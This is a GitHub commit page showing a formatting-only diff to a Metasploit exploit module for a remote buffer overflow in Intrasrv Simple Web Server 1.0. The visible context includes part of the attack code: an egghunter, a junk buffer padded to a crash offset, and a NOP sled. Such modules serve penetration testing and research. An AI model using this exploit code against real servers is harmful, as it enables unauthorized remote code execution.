Skip to content

Commit 185ef2e

Browse files
committed
msftidy
1 parent 6fe4e3d commit 185ef2e

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

modules/exploits/windows/http/intrasrv_bof.rb

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -17,11 +17,11 @@ def initialize(info={})
1717
super(update_info(info,
1818
'Name' => "Intrasrv 1.0 Buffer Overflow",
1919
'Description' => %q{
20-
This module exploits a boundary condition error in Intrasrv
21-
Simple Web Server 1.0. The web interface does not validate the
22-
boundaries of an HTTP request string prior to copying the data
23-
to an insufficiently large buffer. Successful exploitation leads
24-
to arbitrary remote code execution in the context of the application.
20+
This module exploits a boundary condition error in Intrasrv Simple Web
21+
Server 1.0. The web interface does not validate the boundaries of an
22+
HTTP request string prior to copying the data to an insufficiently large
23+
buffer. Successful exploitation leads to arbitrary remote code execution
24+
in the context of the application.
2525
},
2626
'License' => MSF_LICENSE,
2727
'Author' =>
@@ -86,7 +86,7 @@ def exploit
8686
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
8787
:checksum => true
8888
})
89-
89+
9090
# setup buffer
9191
buf = rand_text_alpha(target['Offset']-128) # junk to egghunter
9292
buf << make_nops(8) + hunter # nopsled + egghunter at offset-128

0 commit comments

Comments
 (0)